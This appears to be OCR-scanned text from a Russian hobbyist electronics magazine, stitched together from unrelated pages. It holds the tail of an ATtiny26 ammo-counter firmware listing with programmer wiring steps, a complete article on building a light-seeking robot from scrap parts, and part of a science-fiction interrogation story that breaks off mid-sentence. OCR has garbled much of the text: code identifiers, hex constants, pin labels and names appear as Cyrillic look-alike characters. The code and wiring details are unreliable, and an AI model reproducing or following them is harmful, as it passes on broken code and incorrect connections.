суем единицы 

РОКТА = Охбб; // программа без 
магических чисел неинтересна 

сЬі ( РОКТВ , РОКТВО ) ; // выключа- 

ем анод правого разряда 

зЬі ( РОКТВ , РОКТВ1 ) ; // включаем 

анод левого разряда 



РОКТА=с1ід [беез ] ; // выводим 

цифру 
} 

еізе іг (г==1) 

{ 

г = 0 ; / / в следующем цикле 

рисуем десятки 

РОКТА = ОхЕ^; // программа без 
магических чисел неинтересна 

сЬі ( РОКТВ , РОКТВ 1 ) ; // включаем 
анод правого разряда 

зЬі ( РОКТВ , РОКТВО ) ; // выключаем 
анод левого разряда 

РОКТА=бід [пшпЪег ] ; // выводим 
цифру 

} 

} 

Чтобы залить прошивку, я подпаял пять про- 
водков от І_РТ напрямую к ножкам микросхе- 
мы: [М05І-1] кЦРТ-7], [МІ50-2] к [І_РТ-1 0], 
[5СК-3] к [6РТ-6], [Р5Т-10] к [І_РТ-9], [6Ш-6] 
к [ЕРТ-25]. И сделал две перемычки: [6РТ-2] 
к [І_РТ-1 2] и [І_РТ-3] к [|_РТ-1 1], чтобы шнурок 
опознался как программатор. В РопуРгод’е 
необходимо указать, что мы используем АѴР 
І5Р 1/0 на І_РТх и шьем Юпу26. Заливай .Нех 
в кристалл. После проверки работоспособ- 
ности изделия отпаивай провода, чтоб не 
мешались. 

Этот программатор называется 5ТК-200. 

В интернете приведена очень мудреная 
схема его использования. Но ее вполне 
можно упростить до прямого соединения 
проводников. Этим программатором можно 
прошивать напрямую из Си-компилятора. Но 
если неохота переучиваться и паять новый 
программатор, используй программу, которой 
зашивал й і_Н а 11; в предыдущей статье. 

Только распайка его будетдругая (посмотри 
соответствие программируемых контактов 
микросхемы АТтеда8535 и АТйпу26). 

Н В БОЙ 

Итак! Подаем питание, входим в режим уста- 
новки емкости, выбираем подходящее число 
патронов и... готово! Счетчикбудет исправно 
отсчитывать количество душ, которыеты еще 
можешь загубить до того, какпоследняя пуля 
вылетит из ствола... С таким девайсом ты име- 
ешь все шансы стать самым стильным, продви- 
нутым и беспощадным десантником в отряде. 
Если утебя есть предложения поулучшению 
девайса, наработки по инсталляции кремние- 
вых мозгов в другие суровыетемы, пиши мне на 
почту или заходи в сообщество ги_гасІіо_е[есІ:г в 
Ііѵещигпаі-.сопп . НЕ 
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Путь к свету 



Простейший роботѣ! 
из подручных средстві 



Многие из тех, кто имеет дело с вычислительной техникой, мечтают собрать своего ро- 
бота. Хотят, чтобы это устройство выполняло какие-то обязанности по дому, к примеру: 
приносило пиво. И сразу берутся за создание наисложнейшего робота, однако зачастую 
быстро разочаровываются в результатах. Своего первого робота, который должен был 
делать уйму всего, мы так и не довели до ума. Поэтому лучше начинать с простого, посте- 
пенно усложняя своего зверя. Сейчас мы поведаем тебе, как из подручных средств можно 
собрать простейшего робота, который будет самостоятельно передвигаться по твоей 
квартире. 



Н КОНЦЕПЦИЯ 

Мы поставили перед собой задачу сделать робота из подручных средств 
за 1 5 минут. Обычно подобные поделки конструируются годами. Народ по 
нескольку месяцев бегает по магазинам в поисках нужной шестеренки. Но 
мы сразу осознали: это не наш путь! Мы будем использовать в конструкции 
робота только такие детали, которые всегда можно найти под рукой или вы- 
корчевать из старой техники. В крайнем случае — купитьза гроши в любом 
радиомагазине или на рынке. 

Другая задача состояла втом, чтобы максимальноудешевить нашу поделку. 
В магазинах радиоэлектроники подобный робот стоит от 800 до 1500 рублей, 



а его ведь еще и собирать придется, поскольку продается он в виде деталей 
И гарантий, что после сборки он заработает, никто не дает. Производители 
таких наборов нередко забывают положить туда какую-нибудь детальку. 
Зачем нам такое «счастье»? Наш робот по деталям должен быть не дороже 
1 00-150 рублей, включая двигатели и батарейки. При этом если моторчики 
выковырять из старой детской машинки, то общая стоимость его состав- 
ляющих вообще снизится до 20-30 рублей! Чувствуешь, какая экономия, и 
при этом ты получаешь отличного товарища! 

Важный этап в работе — определениетого, что будет делать наш красавец. 
Мы решили изготовить робота, ищущего источники света. Если источник 
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света будет поворачиваться, то наша машинка будет рулить вслед за ним. 
Мы назвали эту концепцию «Робот, стремящийся жить». При замене бата- 
реексолнечными элементами робот будет искать свет, чтобы ездить. 

г НЕОБХОДИМЫЕ ДЕТАЛИ И ИНСТРУМЕНТЫ 

Что же нам понадобится для изготовления нашего детища? Поскольку идея 
состоит в сборе робота из подручных средств, нам понадобится монтажная 
плата или просто обычная плотная картонка. В картонке шилом можно про- 
делать дырочки для крепления всех деталей. Мы же будем использовать 
монтажку, поскольку под рукой оказалась именно она, а картонку в моем 
доме днем с огнем не сыщешь. Монтажка сыграет роль шасси, на которое 
мы будем монтировать весь остальной обвяз робота, крепить двигатели и 
датчики. В качестве движущий силы мы используем трех- или пяти вольто- 
вые моторчики, которые можно выковырять из старой машинки. Колесики 
мы сделаем из крышекот пластиковых бутылок, например отсосасола :]. 

В качестве датчиков мы задействуем трехвольтовые фототранзисторы 
или фотодиоды. Их можно вынуть из старой оптомеханической мышки. В 
ней стоятинфракрасныедатчики (в нашем случае они черненькие). Они 
там спарены, то есть два фотоэлемента — в одном флаконе. При наличии 
тестера ничего не мешает выяснить, какая ножка для чего предназначена. 
Управляющим элементом у нас будут отечественныетранзисторы 81 6 Г. В 
качестве источников питания заюзаемтри пальчиковых батарейки, спаян- 
ных между собой. Можно взять батарейный отсекот старой машинки, как 
это сделали мы. Для монтажа нужны будут проводочки. Для этих целей иде- 
ально подходят провода из витой пары, которых в доме любого уважающего 
себя хакера должно бытьзавались. Для закрепления всех деталей удобно 
использовать термоклей стермопистолетом. Это прекрасное изобретение 
быстро плавится и также быстро схватывается. Штука идеально подходит 
для таких поделок, и сіііпуі не раз использовал ее в своих статьях. Еще нам 
понадобится жесткая проволока, на роль последней вполне сгодится обыч- 
ная канцелярская скрепка. 

Н МОНТИРУЕМ СХЕМУ 

Ты подготовил все детали и сложил их на своем столе?Твой паяльник 
уже тлеет канифолью и ты потираешь руки,жаждя сборки? Ну что ж, тогда 
приступим. 

Берем кусок монтажки и обрезаем его по размерам будущего робота. Для 
резки текстолита используй ножницы по металлу. Мы сделали квадрат со 
стороной примерно4-5 см. Главное, чтобы на нем уместилась наша кро- 
хотная схемка, батарейки питания, два двигателя и крепеждля переднего 
колеса. Чтобы плата не лохматилась и была ровной, можно обработать ее 
напильником и убрать острые края. 



Следующим нашим шагом будетзапайка датчиков. Учти, фототранзисторы 
и фотодиоды имеют плюс и минус. Нужно соблюдать полярность их включе- 
ния, что несложно сделать при помощи простейшего тестера. В случае если 
ты ошибешься, ничего не сгорит, но робот ездить не будет. Датчики впаивай 
поуглам монтажной платы с одного края, чтобы они смотрели в стороны. Не 
запаивай их в плату полностью, оставь где-то полтора сантиметра выводов, 
чтобы их легко можно было изгибать в любую сторону — в дальнейшем нам 
это понадобиться при настройке нашего робота. Это будут глаза, они долж- 
ны находиться на одной стороне шасси, которая в будущем станет передом 
робота. Сразу можно отметить, что мы собираем двеуправляющие схемы: 
одну для управления правым, вторую —левым двигателем. 

Чуть поодаль переднего края шасси рядом с нашими датчиками нужно 
впаять транзисторы. Для удобства запайки и дальнейшей сборки схемы оба 
транзистора мы запаяли «смотрящими» своей маркировкой в сторону пра- 
вого колеса. Сразу надо отметить расположение ножекутранзистора. Если 
взятьтранзистор в руки и повернуть металлической подложкой к себе, а 
маркировкой к лесу (как в сказке) и при этом ножки будут направлены вниз, 
то ножки слева направо — база, коллектор и эмиттер. Если ты посмотришь 
на схему, где изображен наш транзистор, то база — палочка, перпендику- 
лярная толстому отрезку в кружке, эмиттер — палочка со стрелочкой, кол- 
лектор — такая же палочка, только без стрелки. Здесь вроде все понятно. 
Подготовим батарейки и приступим непосредственно ксборке электри- 
ческой схемы. Изначально мы просто взялитри пальчиковых батарейки 
и спаяли их последовательно. Их можно сразу вставить в специальный 
держатель для батареек, который, как мы уже говорили, вытаскивается из 
старой детской машинки. Теперь подпаяй провода кбатарейкам и определи 
у себя на плате две ключевые точки, куда будут сходиться все провода. 

Это будет плюс и минус. Мы поступили просто: продели витую пару в края 
платы, запаяли концы ктранзисторам и фотодатчикам, сделали скручен- 
ную петельку и туда подпаяли батарейки. Возможно, это не самый лучший 
вариант, но зато самый удобный. 

Ну чтож, теперь готовь провода, и приступим ксборке электрики нашего 
робота. Будем идти от отрицательного полюса батарейки к положительному 
контакту по всей электрической схеме. Берем кусок витой пары и начинаем 
идти: припаиваем отрицательный контакт обоих фотодатчиков к минусу 
батареек, в то же место запаиваем коллекторы транзисторов. Вторую ножку 
фотоэлемента припаиваем небольшим куском провода кбазетранзистора. 
Оставшиеся ножки транзюков припаиваем кдвигателям. Второй контакт 
моторчиков можно подпаять к батарейке через выключатель. Но мы, как 
истинные фрикеры, решили включать/выключать нашего робота подпаива- 
нием/отпаиванием провода, так как выключателя подходящих размеров в 
моихзакромах не обнаружилось. 
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Обязательно пиши 
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успехах в сборке 
робота. Предлагай 
свои идей и усо- 
вершенствования. 
Может, научишь 
чему и нас. 
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Н ОТЛАДКА ЭЛЕКТРИКИ 

Все, электрическую часть мы собрали, теперь приступим ктестированию 
схемы. Включаем нашу схему и подносим ее кзажженной настольной 
лампе, поворачивая поочередито одним, то другим фотоэлементом. Если 
двигатели начинают вращаться по очереди с разной скоростью в зави- 
симости от освещения, значит все в порядке. Если нет, то ищи косяки в 
сборке. Электроника — наука о контактах, а это значит, что если что-то не 
работает, то где-то нет контакта. 

Смотри, теперь важный момент: правый фотодатчик отвечает за левое 
колесо, а левый, соответственно — за правое. Теперь прикинь, в какую 
сторону вращаются правый и левый двигатели. Они оба должны кру- 
титься вперед. Если этого не происходит, поменяй полярность вклю- 
чения двигателя, который крутится не в ту сторону, просто перепаяв 
провода на клеммах моторчика наоборот. Оцени еще раз расположе- 
ние моторчиков на шасси и проверь направление движения в сторону. 
Все двигатели должны вращаться так, чтобы робот двигался вперед. 
Если все в порядке, то идем дальше. В любом случае ты сможешь это 
исправить даже после того, как соберешь все окончательно. 

0 СБОРКА ДЕВАЙСА 

С муторной электрической частью мы разобрались, теперьзаймемся ме- 
ханикой. Колесики, как мы и договаривались, мы будем делать из крышек 
от пластиковых бутылок. Для изготовления переднего колеса возьмем 
две крышки и склеим их между собой. Мы склеивали по периметру полой 
частью вовнутрь для большей устойчивости колеса. 

Дальше точно по центру просверливаем отверстие в первой и второй 
крышке. Для сверления и всяких домашних дел очень удобно пользоваться 
дремелем — маленькой дрелью суймищей насадок: фрезеровальных, от- 
резных и многих других. Она незаменима для сверления отверстий меньше 
одного миллиметра, где обычная дрельуже не справляется. 



Послетого как мы просверлим крышки, вдеваем в отверстие предваритель- 
но разогнутую скрепку. Изгибаем скрепку в форме буквы п, где на верхней 
планке будет болтаться наше колесо. Теперь закрепляем эту скрепку между 
фотодатчиками спереди нашей машины. Скрепка удобнатем, что можно 
легко подрегулировать высоту переднего колеса, и этой юстировкой мы 
займемся позже. 

Перейдем к движущим колесам. Их мы тоже будем делать из крышек. 
Аналогично просверливаем каждое колесо строго по центру. Хорошо, если 
сверло будет диаметром с ось моторчика, а в идеале — на доли миллиметра 
меньше ее, чтобы ось в отверстие вставлялась, но струдом. Одеваем оба ко- 
леса на вал движков и, чтобы они не соскакивали, закрепляем ихтермокле- 
ем. Это важно сделать еще и для того, чтобы колеса не проворачивались в 
месте крепежа. 

Самая ответственная часть — крепеж электродвигателей. Мы их ставили в 
самом конце нашего шасси с противоположной относительно всей осталь- 
ной электрики стороны монтажной платы. Незабудь, что управляемый дви- 
гатель крепится напротив своей управляющей фотосистемы. Это сделано 
для того, чтобы робот мог поворачивать на свет. Справа фотодатчик, слева 
двигатель, и наоборот. 

Для начала мы перехватим движки кусочками витой пары, продев 
их сквозь отверстия в монтажке и скрутив сверху. Подадим питание 
и посмотрим, куда у нас будут вращаться движки. Не забудь, что в 
темной комнате вращаться они не будут вообще, желательно напра- 
вить робота в сторону лампы. Проверяем, все ли двигатели работают. 
Поворачиваем робота и наблюдаем, какдвигатели изменяютсвою 
скорость вращения в зависимости от освещения. Поворачиваемся 
правым фотодатчиком — и левый движок должен шустренько закру- 
титься, поворачиваемся левым — и он должен, наоборот, притормо- 
зиться. В конце проверь направление вращения колес — нам надо, 
чтобы робот ехал вперед. 
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Если все работает, как мы описали, то можно аккуратно закреплять движки 
термоклеем. Постарайся сделатьтак, чтобы их колеса находились на одной 
оси. Все — закрепляй батарейки на верхней площадке шасси и переходи к 
настройке и играм с роботом. 

Н ПОДВОДНЫЕ КАМНИ И НАСТРОЙКА 

Когда мы собрали всю схему и техническую часть, все двигатели прекрасно 
реагировали на свет, и вроде все было отлично. Но поставив нашего робота 
на пол, мы обнаружили, что он у нас не едет. Оказалось, что попросту не хва- 
тает мощности моторчиков. Пришлось в срочном порядке раскурочивать 
очередную игрушечную машинку, чтобы достать оттуда движки помощнее. 
Кстати, если возьмешь моторчики изтаких игрушек, точно не прогадаешь с 
их мощностью, таккакони рассчитаны нато, чтобы возить массу машинокс 
батарейками. 

Разобравшисьсдвигателями, мы перешли кнастройке и приведению в по- 
рядок внешнего вида устройства. Для начала собираем бороды проводов, 
которые у нас волочатся по полу, и укрепляем их на шасси термоклеем. Если 
робот волочится где-то пузом, можно приподнять переднее шасси, изогнув 
крепящую проволку. 

Самое главное — это фотодатчики. Лучше всего их выгнутьтак, чтобы они 
смотрели в сторону под тридцать градусов от основного курса. Тогда робот 
будет улавливать источники света и направляться к ним. Нужный угол 
изгиба придется подобратьэкспериментально. 

Все — вооружайся настольной лампой, клади робота на пол, включай и 
начинай проверять и радоваться тому, кактвое произведение четко следует 
к источнику света и каконо ловко его находит. 

Н УСОВЕРШЕНСТВОВАНИЯ 

Нет предела совершенству, и расширять функционал нашего робота можно 
до бесконечности. Были мысли даже поставить контроллер, нотогда стои- 
мость и сложность изготовления возросли бы в разы, а это не наш метод. 
Первое усовершенствование — сделатьтак, чтобы робот ездил по 
заданной траектории. Здесь все просто: печатается на принтере или 
рисуется черным перманентным маркером на листе ватмана черная по- 
лоса. Важно, чтобы она была немного уже расстояния между фотодатчи- 
ками. Сами фотоэлементы мы опускаем вниз, чтобы они смотрели в пол. 
Рядом с каждым нашим глазиком мы устанавливаем последовательно 
сверхъяркий светодиод с сопротивлением в 470 Ом. Сам светодиод с 
сопротивлением запаиваем напрямую к батарейке. Идея проста — свет 



прекрасно отражается от белого листа бумаги, попадает на наш датчик, 
и робот едет прямо. Кактолько луч падает на темную полосу, на фото- 
элемент почти не попадает света (черная бумага прекрасно поглощает 
свет), и, следовательно, один двигатель начинает вращаться медлен- 
нее. Другой моторчик резво поворачивает робота, выравнивая курс. В 
результате робот катается по черной полоске, словно по рельсам. Такую 
полосу можно начертить на белом полу и, например, посылать робота на 
кухню за пивом оттвоего компутера. 

Вторая идея — это усложнить схему, добавив еще два транзистора 
и два фотодатчика, и сделать так, чтобы робот искал свет не только 
спереди, но и со всех сторон и, кактолько находил, устремлялся бы к 
нему. Для упрощения сборки в этом случае можно использовать мик- 
росхему Б М 293 Б , однако она стоит порядка 100 рублей. С помощью 
нее можно легко настроить дифференциал ьное включение направ- 
ления вращения колес, или, проще говоря, направление движения 
робота вперед-назад. 

Далее — можноубрать обычные постоянно садящиеся батарейки и по- 
ставить солнечную батарею, которая сейчас легко покупается в магазине 
аксессуаров к мобильным телефонам. Чтобы избежать полной потери 
дееспособности робота в этом режиме, в случае если он случайно заедет в 
тень, параллельно солнечной батареи можно подключить электролитиче- 
ский конденсатор очень большой емкости (тысячи микрофарад). Поскольку 
напряжениетам у нас не превышаетб В, подойдет конденсатор, рассчитан- 
ный на 6,3 В. При такой емкости и таком напряжении он будет достаточно 
миниатюрен. Кондер можно купить или выкорчевать из старого блока 
питания. 

Ну а остальныеусовершенствования придумывай сам. Если будет что-то 
интересное — обязательно напиши нам! 

^ ВЫВОДЫ 

Вотты и приобщился к величайшей науке, двигателю прогресса — ки- 
бернетике. В 70-е годы прошлого века конструирование подобных 
роботов было очень популярно. Надо отметить, что в нашем устройстве 
применяются зачатки аналоговой вычислительной техники, которая 
отмерла с появлением цифровых технологий. Но, как мы показали в 
этой статье, не все потеряно и забыто. Мы надеемся, ты не остано- 
вишься на предложенной нами схеме и будешь придумывать свои ори- 
гинальные конструкции. Удачи в сборке, фри кер, и смотри не обожгись 
об паяло ! т 
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идя на полу с разбитым лицом, много не навоюешь. Осо- 
бенно если за дверью охрана. На окне не было решеток, 
только жалюзи, но Мишельзнал, что этаж как минимум 
четвертый, а потому шансов покинуть комнату не было 

никаких. 

«Ты должен суметь продержаться с момента ареста хотя бы три часа, 

— вспоминал он слова наставника. — Три часа. Если получится 
больше, то лучше напрячься и отхватить у них еще минуттридцать. 
Чип обработан так, что сразу они к нему не подберутся. Даже если 
натравят на тебя своих лучших людей...» 

Подходил к концу второй час. Двое молодых парней в серебристых 
комбинезонах настраивали в дальнем углу комнаты какую-то штуку, 
от одного вида которой становилось не по себе — стоило лишь 
вспомнить о конфигурации разъема на затылке и посмотреть на 
свисающие коннекторы. Мишельуже не делал попытки заговоритьс 
ними — лицо ему разбили именно тогда, когда он поинтересовался у 
одного из них, который час. Дверь спустя секунду открылась, вошел 
какой-то монстр с автоматом и коротко, но хлестко дважды ударил его 
прикладом. Сознание покинуло Мишеля на некоторое время, а когда 
онпришелв себя, желания общаться больше не было. 

«— ...Самое главное — вовлечь их в разговор. Торгуйся, смейся, 
издевайся над ними, но держись. Не давай им подключиться ктебе 
раньше. Они наверняка поместяттебя в экранированное поме- 
щение, поэтомумы не сможем помочьтебе сразу. Ачтобы нанобот 
нашел тебя в этом чертовом мегаполисе, нужно не меньшетрех 
часов. Вот откуда вязался этот срок, эта цифра. Кактолькоты будешь 
запеленгован, бот внедрится в чип... 

— Внедрится? В чип? 

— Чемуты удивляешься? Там столько секретной информации, 
что после его взлома нам не останется даже пяти минут на сборы 

— возьмут всех и сразу! Откуда втебе столько наивности в отношении 
техники? 

— Нисколько я неудивляюсь. Мое дело — убивать. Ваше — делать 
так, чтобы все случилось именнотам и именнотогда, где и когда 
запланировано. Я совершенно незаинтересован втом, чтобы эта 
штука где-то в затылке корректировала мою жизнь. Так что если это 
нужно вам, сами и занимайтесьэтой проблемой. Что же случится 
через три часа, если вы не сможете найти меня, а вместе со мной и 
мой чип? 

— Я не хотел бы даже думать об этом. У нас отработана схема 
эвакуации... Мы не станем ждать три часа. Через два с половиной 
руководство движения будет вынуждено сменить место базирова- 
ния. Основные подразделения также будут передислоцированы. 

Суть — через три часа после задержания ты уже будешь не нужен 
ни мне, ни кому-либо другому. Ты станешь списанным материалом. 
Безвозвратной потерей. Но ведьты знаешь, на что идешь? 

— Конечно. Я один изтех, кто служит вам не из финансовых, а из 
идейных соображений. 




— Да, я помню. Будем думать о хорошем, но... Но есть одно но, 
Мишель. Мы играем против людей, подготовленных ничуть не хуже 
нас. Есть один человек, против которого мы бессильны. Хотелось бы 
сказать: «Пока бессильны», но почему-то в светлое будущее верится 
струдом. Никто из ныне живущих никогда не видел его, а те, кто ви- 
дел, уже давно мертвы и не могут ничего рассказать. Есть только одно 

— прозвище. Антиквар. Запомни: если втечение первых двух часов 
ктебе придет Антиквар... Ампулу с ядом далеко не прячь. Понял? Он 
вынет из тебя душу, а вместе с ней и информацию из чипа...» 

Мишель подумал, что два часа уже прошли. Если через тридцать 
минутон не почувствует под кожей плеча колючий микроимпульс, 
значит все кончилось и его списали. 

Ноги затекли, но он боялся даже пошевелиться — парни за дверью, 
похоже, наблюдали за ним через какую-то скрытую камеру. Облизнув 
разбитые губы, он медленно покрутил головой, разминая окаменев- 
шие мышцы шеи. 

— Где этот проклятый Антиквар? — шепнул он себе под нос. — Су- 
ществует ли на самом деле? 

Парни отошли на пару шагов оттого устройства, которое сосредото- 
ченно настраивали всето время, что Мишель находился в комнате, 
покачали головами, а потом один из них что-то сказал в микрофон, 
спрятанный где-то в воротнике. 

За дверью послышались шаги. Дверь отворилась, в комнату вошел 
человек — высокий, властный, в сером костюме и сверкающих ла- 
ковыхтуфлях, которые сразу приковали взгляд Мишеля. Остановив- 
шись в дверях, мужчина осмотрелся, молча кивнул парням, которые 
только и ждали этого сигнала, чтобы в мгновенье ока исчезнуть. 

— Мое имя Лоренс, — представился он, стоя спиной к Мишелю. 

— Вам предстоит общаться со мной втечение ближайших суток. Если 
вы неумрете раньше. 

«Сутки, — облегченно вздохнул пленник. — Значит, они успеют. Не 
придется даже напрягаться, выпутываться из этих сетей. Напротив, 
надо покрепче в нихувязнуть...» 

Тем временем Лоренс достал из внутреннего кармана пиджака 
маленькую записную книжку и ручку «Паркер», зачем-то посмотрел 
на часы и подошел кокну. 

Лоренс пальцем отодвинул пластикжалюзи, сквозь прищуренные 
веки посмотрел на улицу, вздохнул. Вид из окна был удручающий 

— практически кадр из антиутопии. Обшарпанные стены, битые 
стекла... 

— Выбралиже место, черт побери... Кондиционера нет, воняетчем- 
то... И, кажется, имеются тараканы. 

Жалюзи с сухимтреском вернулись на место. Закрыв глаза и помас- 
сировав их пальцами, Лоренс нехотя повернулся. 

Изнутри дела обстояли ничуть не лучше. Стены с облезлыми обоями, 
исцарапанный паркет, практически полное отсутствие мебели. 
Вместо люстры сиротливая лампочка на проводе. Хорошо хоть 
яркая... 
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На фоне такого грустного интерьера Лоренс выглядел просто 
сногсшибательно — и именно за это его и ценило руководство. Этот 
мужчина в дорогом сером костюме от Гуччи с маленькой записной 
книжкой и «Паркером» в руках производил очень мощное впечатле- 
ние на всех, с кем имел дело. Не нужны были никакие автоматы, ни- 
какие бластеры из бутафории Голливуда —только этот миниатюрный 
блокнотики ручка сзолотым пером. Дополнял картину совершенно 
безумный парфюм, который сводил сума и женщин, и мужчин — в 
зависимости оттого, с кем работал Лоренс втотмомент. 

— Тараканы... — повторил он и поставил в блокноте жирную галку, 

— это плохо. 

— Почему? — спросил Мишель. 

— Этозначит, что здесь пока еще есть для нихпища, — пояснил 
Лоренс, — и, какследствие, квартира уже не кажется мне забытой и 
покинутой. Атак не должно быть... 

Лоренсзакрыл блокнотик и убрал его во внутренний карман пид- 
жака. Золотое перо было спрятано под колпачок, однако ручка пока 
осталась зажатой в ладони. 

— Что это за штука? — Мишель кивнул в сторону стойки саппара- 
турой. — Детектор лжи? Сканер памяти? Или что-то еще? Что-то из 
области научной фантастики? 

Лоренс ухмыльнулся. 

— Вы мелко плаваете. Сканеры, детекторы... Это все существуетуже 
настолько давно, что глупо было верить, будто никто не придумал 
средств защиты от подобного рода воздействия. Уверен, что вы 

— создание достаточно тренированное. Да и ваш чип наверняка 
обладает средствами противостояния. 

— Так на что же вы надеетесь? 

— Знаете, что я вам скажу... Все настолько серьезно, я сомневаюсь 
втом, что мы оба покинем эту комнату... По крайней мере, целыми и 
невредимыми. 

— Ну-ну... — казалось, что общаются два равных человека. Ни еди- 
ным словом, кроме последней скрытой угрозы, Лоренс не выдавал 
своего превосходства, которое, безусловно, имело место. 

— Верить или не верить— вашедело, — по-прежнему ровно и даже с 
некоторой долей сопереживания в голосе кивнул он, — вы ведь пони- 
маете, мыс вами здесь далеко не на равных — причем в обе стороны. 

— То есть? 

— То естьу каждого из нас есть некий аргумент, который делает нас 

— опять-таки каждого в своей области — неуязвимым перед собе- 
седником. Но вотсреднееарифметическое... 

— Неужели стремится к нулю? 

Лоренсулыбнулся, покрутил «Паркер» между пальцами и кивнул. 

— Точно. Давайте прикинем... 

Подойдя поближе, он остановился в паре метров. Пальцы правой 
руки оченьловко снимали с ручки колпачок и одевали его обратно. 
Мишель перевел взгляд с лица Лоренса на эти акробатические 
изыски и обратно, после чего сделал попытку подняться, но власт- 
ный взгляд пригвоздил его к полу. 

— Вы здесь не по своей воле — раз, — взмахнул Лоренс ручкой, 
словноуказкой. — Согласны? Ну еще бы... Вы не можете встать иуйти 

— два. Я здесь главный —три. За дверями — сила, с которой вам не 
совладать, — четыре. Все эти факты делают вас оченьуязвимым. 
Ручка летала туда-сюда, словно большая золотая пчела. Во всем 
этом не было и намека на попытку гипноза — просто Лоренсу, как 
дирижеру, такбылоудобнее отмечать вехи в разговоре. 

— Свои плюсы вы перечислили. Теперь давайте мои минусы, и 
будем надеяться, что они окажутся не менее значимыми, — по звуча- 
нию голоса чувствовалось, что противник в этом диалоге у Лоренса 
достойный. 

— Минус один, но он очень большой, — раздалось в ответ. — Вам 
известны адреса нескольких участников антиправительственной 
организации, именуемой себя «Ауткаст». Вы позиционируете себя 
изгоями в современном обществе и в силу разных причин совершае- 
те противоправные действия, направленные на подрыв авторитета 
существующего строя... 



— Как по учебнику! «Ауткаст»! И у вас я, наверное, прохожу не под 
именем, а под какой-нибудь кличкой! 

— Точно. В вашей организации никто не знает вашего настоящего 
имени. По нашим сведениям, вы сменили несколько подставных 
имен, живете по поддельному паспорту и сейчас являетесь гражда- 
нином Греции с неожиданным французским именем Мишель Мегрэ. 
Вы в детстве начитались детективов? Поклон н и кЖоржа Сименона? 

— Да. У меня действительно много имен — и последнее мне нравит- 
ся больше всего. 

— Втеперешнем контексте слово «последнее» приобретаетболее 
широкий смысл, — усмехнулся Лоренс. — Давайте-ка я озвучу, что 
я ожидаю от нашего совместного пребывания в этой комнате. Вы 
готовы? Итак, вы называете мне имена и местонахождение своих 
ближайших соратников по организации, указываете свои ближай- 
шие цели, живописуете в красках свою последнюю мерзость под на- 
званием «Взрыв подЭйфелевой башней»... Надо же, ятолькосейчас 
обратил внимание на эту связь: сначала вы выбираете себе новое 
имя, а потом... Французское имя — взрыв воФранции... Впредь надо 
быть более внимательным к мелочам... 

Лоренс пробормотал себе под нос «Растяпа...» и отошел кокну. 
Вообще, это была не его задача — решать головоломки. Его всегда 
подключали натех этапах операции, когда былоуже недо этого 

— когда наступал форс-мажор, когда такие сволочи, как этот Мег- 
рэ, находились в паре шагов отсовершения очередного преступ- 
ления. Но едва он подступался к своей части работы, как нередко 
замечал очень серьезные логические просчеты у своих коллег по 
министерству. 

— Привыкли... стволами махать, — сказал он сам себе, вновь подой- 
дя кжалюзи, — силовики. Апотом: «Господин Лоренс, задержанный 
не высказываетжелания сотрудничать... Явно не приказываю, но... 
Ваше вмешательство необходимо в интересах национальной безо- 
пасности...» Чистюли! Если бы хоть один из них напряг свои мозги... 
Он резко повернулся к Мишелю. 

— Думаете, вы умнее всех? Я ненавижутеррористов стех самых пор, 
как еще в школе прочитал о том, что мир перевернулся одиннадца- 
того сентября! Ведь эта система тотального контроля, которую вы 

— непонятно из каких соображений — стремитесь побороть, именно 
она помогла победить чумутерроризма! И плюс ко всему, когда вас 
проклинают, считая нелюдями, я искренне радуюсь тому факту, что 
скоро истина ста нет доступ на всем. Киборги хреновы... 

Мишель прищурился. Последние слова ему очень не понравились. 

— Что, я неправ? — Лоренс подошел вплотную; Мишельуже 
представил, кактот сейчас нарисуетему своей ручкой крест на 
лбу и вы стрел ит туда. — Ведь вы люди процентов на восемьдесят. 
Остальное — полупроводники. Вы идеальные исполнители. Знаешь 
ведь прекрасно, что это за штуковина, — и он махнул рукой в сторону 
прибора, — кактолько мнеудастся подключиться ктебе и снять 
защиту, тайна твоей организации наконец-то ста нет достоянием 
службы безопасности. 

— Да, вы правы, — сухо подтвердил Мишель, — я киборг. И я знаю, 
что запрограммирован. Но вы не представляете в процентном 
соотношении, сколько во мне истинного фанатизма и сколько 
компьютерного. 

— Уверен, что компьютерного, встроенного втебя — все сто, — Ло- 
ренс отступил на шаг, — еще никто из вас не смогдоказать обратного. 

— Вам? 

— Атутчто, естьеще кто-то? — Лоренс усмехнулся. — Мне. Больше 
никому доказывать не надо. 

И вдруг Мишеля словно осенило: 

— Вы Антиквар? 

Лоренсзамер на мгновенье и сделал шагобратно нато место, где 
стоял. 

— Антиквар? — переспросил он, пробуя слово на вкус. — Почему? 
Мишель молчал. Или он ошибся, или это такая игра. 

— Не знаю... Мне показалось, что... Да бросьте, забудем это. Глупость 
какая-то... 
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— Отчегоже... — Лоренсхитро прищурился и улыбнулся. — Где 
вы услышали это слово? Вас инструктировали? 

— Нет, — ответил Мишель и сразу понял: звучит фальшиво. Но 
все равно повторил: 

— Нет. 

— Хорошо, — Лоренс наклонился к самому лицу Мишеля. 

— Да, я Антиквар. 

В следующую секунду Мишель медленно отклонился назад, 
уперся затылком в стену и внезапно рванул угол воротника. 
Что-то маленькое сверкнуло на губах, и втоже мгновенье Ло- 
ренс, словно ожидая чего-то подобного, со скоростью молнии 
воткнул «Паркер» ему в рот. Что-то хрустнуло, но это была не 
ампула с ядом, а выбитый зуб. 

Мишельзахрипел, но челюсти сжать не смог— ручка не 
поддалась. Дверьхлопнула. Чьи-то сильные руки схватили его 
голову, удар вживотзаставил закашляться. Лоренс нажал на 
кончик«Паркера» — и рот Мишеля сам собой стал раскры- 
ваться. Он попытался проглотить ампулу, но Антиквартолько 
рассмеялся: 

— Даже и не пытайтесь. Глотать целиком — бессмысленно. 
Думаете, вы первый? Нет, со мнойтакие фокусы давно не 
проходят. Мой любимый «Паркер» со встроенным роторасши- 
рителем сделан из титанового сплава — перекусить неудастся. 
Думаете, я просто тактут ручкой у вас перед носом размахи- 
ваю? Смешно... 

Он вынул изо рта Мишеля ампулу, бросил на пол и раздавил. 

— Скажите, почему вы боитесь меня? Ведь наверняка вы 
делаете это неосознанно. Вас заинструктировали? 

Мишель смотрел на него волком. По подбородкутекла кровь. 

Он косилсято на Лоренса, то на автоматчика, который пока не 
вышел из комнаты, и не делал никаких попытокосвободить рот 
отжелезной штуки. 

— Понимаю, стакой штукой во рту много не наговоришь. Но 
можно просто кивнуть... 

Неожиданно Мишель ощутил какой-то легкий укол в углу 
правого глаза. Он заморгал, но руку, уже метнувшуюся к глазу, 
сумел остановить и пальцем показал на жуткое изобретение 
Лоренса. 

— Ладно, убираю. Но поверьте, такие фокусы со мной не про- 
